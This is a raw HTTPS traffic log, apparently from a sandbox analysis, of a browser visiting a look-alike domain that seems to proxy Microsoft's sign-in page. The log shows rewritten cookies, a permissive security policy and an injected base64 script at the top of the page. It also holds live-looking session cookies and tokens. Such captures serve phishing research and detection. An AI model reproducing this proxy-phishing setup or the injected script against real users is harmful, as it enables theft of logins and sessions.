                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                        2025-03-17 16:42:48 UTC3043INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: df72b11c-05c4-422e-91e3-b22c98b74700
                                                        x-ms-ests-server: 2.1.20262.4 - NCUS ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-clitelem: 1,0,0,,
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-hPRQwc6UM3dh3ijl34qXBQ' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Set-Cookie: buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; expires=Wed, 16-Apr-2025 16:42:48 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; domain=hapiinenstys.criadordeconexoes.com.br; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; domain=hapiinenstys.criadordeconexoes.com.br; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; expires=Wed, 16-Apr-2025 16:42:48 GMT; path=/; secure; HttpOnly; SameSite=None
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Date: Mon, 17 Mar 2025 16:42:47 GMT
                                                        Connection: close
                                                        content-length: 48290
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:48 UTC13341INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49
                                                        Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoI
                                                        2025-03-17 16:42:48 UTC16384INData Raw: 44 73 50 5f 41 2d 66 38 61 2d 37 6f 42 71 39 50 7a 37 4a 64 38 50 70 5f 6a 70 72 4b 42 6d 65 47 76 68 74 37 6f 53 74 70 47 56 54 47 53 65 62 4a 5a 71 47 6f 34 4d 68 37 78 7a 79 67 4e 66 58 79 57 79 63 43 31 71 4a 4b 44 67 56 4b 71 5f 31 5f 75 35 4f 4c 38 54 57 79 38 52 67 6d 6a 41 37 79 73 2d 2d 51 64 31 61 4e 39 2d 49 41 47 73 61 78 68 35 67 58 7a 44 61 66 6c 66 6a 75 37 30 4b 66 47 38 79 63 2d 6a 64 47 33 6b 76 33 36 56 72 56 36 4c 75 57 30 61 30 4e 4a 5a 39 33 78 68 77 67 51 78 64 54 6e 75 4b 73 6b 68 30 5a 66 78 58 30 6a 76 33 6f 54 6f 62 6a 74 69 65 42 74 6a 77 4a 50 34 77 41 4e 66 70 6e 39 42 35 67 4a 55 73 75 4e 41 62 6c 53 66 48 6b 49 4e 54 6d 71 58 4f 43 67 59 44 6b 71 51 4f 59 5f 67 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 6d 6f 64 65 3d 66
                                                        Data Ascii: DsP_A-f8a-7oBq9Pz7Jd8Pp_jprKBmeGvht7oStpGVTGSebJZqGo4Mh7xzygNfXyWycC1qJKDgVKq_1_u5OL8TWy8RgmjA7ys--Qd1aN9-IAGsaxh5gXzDaflfju70KfG8yc-jdG3kv36VrV6LuW0a0NJZ93xhwgQxdTnuKskh0ZfxX0jv3oTobjtieBtjwJP4wANfpn9B5gJUsuNAblSfHkINTmqXOCgYDkqQOY_g\u0026response_mode=f
                                                        2025-03-17 16:42:48 UTC16384INData Raw: 7b 22 61 75 74 68 65 6e 74 69 63 61 74 69 6e 67 6d 65 73 73 61 67 65 22 3a 22 54 72 79 69 6e 67 20 74 6f 20 73 69 67 6e 20 79 6f 75 20 69 6e 22 7d 7d 2c 22 65 6e 75 6d 73 22 3a 7b 22 43 6c 69 65 6e 74 4d 65 74 72 69 63 73 4d 6f 64 65 73 22 3a 7b 22 4e 6f 6e 65 22 3a 30 2c 22 53 75 62 6d 69 74 4f 6e 50 6f 73 74 22 3a 31 2c 22 53 75 62 6d 69 74 4f 6e 52 65 64 69 72 65 63 74 22 3a 32 2c 22 49 6e 73 74 72 75 6d 65 6e 74 50 6c 74 22 3a 34 7d 7d 2c 22 75 72 6c 73 22 3a 7b 22 69 6e 73 74 72 22 3a 7b 22 70 61 67 65 6c 6f 61 64 22 3a 22 68 74 74 70 73 3a 2f 2f 68 61 70 69 69 6e 65 6e 73 74 79 73 2e 63 72 69 61 64 6f 72 64 65 63 6f 6e 65 78 6f 65 73 2e 63 6f 6d 2e 62 72 2f 63 6f 6d 6d 6f 6e 2f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 2f 72 65 70 6f 72 74 70 61
                                                        Data Ascii: {"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://hapiinenstys.criadordeconexoes.com.br/common/instrumentation/reportpa
                                                        2025-03-17 16:42:48 UTC2181INData Raw: 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 75 6c 6c 21 3d 3d 65 2e 74 61 72 67 65 74 26 26 22 63 64 6e 22 3d 3d 3d 65 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6c 6f 61 64 65 72 22 29 26 26 74 2e 24 4c 6f 61 64 65 72 2e 4f 6e 53 75 63 63 65 73 73 28 65 2e 74 61 72 67 65 74 29 7d 2c 21 30 29 29 7d 28 29 7d 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6c 69 76 65 2e 63 6f 6d 2f 4d 65 2e 68 74 6d 3f 76 3d 33 22 20 2f 3e 0d 0a 20 20 20 20 20
                                                        Data Ascii: .addEventListener("load",function(e){null!==e.target&&"cdn"===e.target.getAttribute("data-loader")&&t.$Loader.OnSuccess(e.target)},!0))}()}(window,document);//...</script> <link rel="prefetch" href="https://login.live.com/Me.htm?v=3" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.44976423.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:48 UTC2766OUTGET /favicon.ico HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; fpc=AjUAFJMlP0ZCgsS-Ll1segI; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEs2cTC55lMzi2CYsw42k_1wqQJXOtMYOzSODe6zEFFYdXCRxaO7gdZQRJIGL8ni-lzNjggwspnf8D3op1jox69xUXOtSl5_g0RklIr1K3i4amZorZVZk5WzXQwODhXgeSWz-JD3usNSG2-o1GAW7N6RK2l6X6aAIHzYd3LZEV1CsgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                        2025-03-17 16:42:48 UTC1725INHTTP/1.1 404 Not Found
                                                        Cache-Control: private
                                                        Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        x-ms-request-id: e6aaaeb0-b819-41db-abc5-537f412f4d00
                                                        x-ms-ests-server: 2.1.20262.4 - WUS3 ProdSlices
                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                        x-ms-srs: 1.P
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-c0nvQclRZhutGNbYaV4k-Q' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                        Date: Mon, 17 Mar 2025 16:42:47 GMT
                                                        Connection: close
                                                        Content-Length: 0
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.44977823.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:49 UTC3254OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:49 UTC781INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:49 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 20410
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Fri, 08 Nov 2024 04:59:25 GMT
                                                        ETag: 0x8DCFFB21E496F3A
                                                        x-ms-request-id: 094bd140-401e-0037-7294-9311fa000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164249Z-r1769bfd58brks2phC1YTO6wus00000005yg00000000atst
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:49 UTC15603INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2
                                                        Data Ascii: }k6wRJH=GSIx9}T*)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}|#xAg*O|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
                                                        2025-03-17 16:42:49 UTC4807INData Raw: 8b ca ba c2 a2 2a 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66 bb 7d ce d8 eb 5e a9 2b 2e 5f 31 9e 3c 14 8e
                                                        Data Ascii: *,1/*+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f}^+._1<


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.44977623.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
